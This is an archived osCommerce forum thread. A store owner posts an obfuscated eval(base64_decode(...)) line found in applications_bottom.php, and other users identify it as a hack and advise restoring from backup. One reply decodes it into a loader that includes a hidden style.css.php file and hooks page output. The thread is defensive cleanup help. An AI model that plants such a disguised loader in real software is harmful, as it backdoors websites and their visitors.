Plux Posted April 13, 2011 Share Posted April 13, 2011 I got this code in applications_bottom.php <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2ZhdHBpcGUvcHVibGljX2h0bWwvYWRtaW4vaW5jbHVkZXMvbGFuZ3VhZ2VzL2VuZ2xpc2gvaW1hZ2VzL2J1dHRvbnMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?> As it is encoded using base64 it gives me a weird feeling. Should this be there in version 2.2 RC2a? Link to comment Share on other sites More sharing options...
Guest Posted April 13, 2011 Share Posted April 13, 2011 No that should not be there in stock osC RC2a. You may want to check out the Security thread in this forum for more help and answers. Security Link to comment Share on other sites More sharing options...
FIMBLE Posted April 13, 2011 Share Posted April 13, 2011 that looks very much like you have been hacked, you will need to clear that out, or preferably restore from a back up of your store. after deleting the fileset on the server first Then follow the security suggestions Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
Plux Posted April 13, 2011 Author Share Posted April 13, 2011 Thanks people. Weird thing is that that was the only infection I could find in all the files.... Link to comment Share on other sites More sharing options...
germ Posted April 13, 2011 Share Posted April 13, 2011 The hack decodes to this: if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){ $GLOBALS['mfsn']='/home/fatpipe/public_html/admin/includes/languages/english/images/buttons/style.css.php'; if(file_exists($GLOBALS['mfsn'])){ include_once($GLOBALS['mfsn']); if(function_exists('gml')&&function_exists('dgobh')){ ob_start('dgobh'); } } } Look for this hack file: /admin/includes/languages/english/images/buttons/style.css.php There may be others. Once securiy is compromised treat EVERY FILE as guilty until proven innocent by close inspection. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.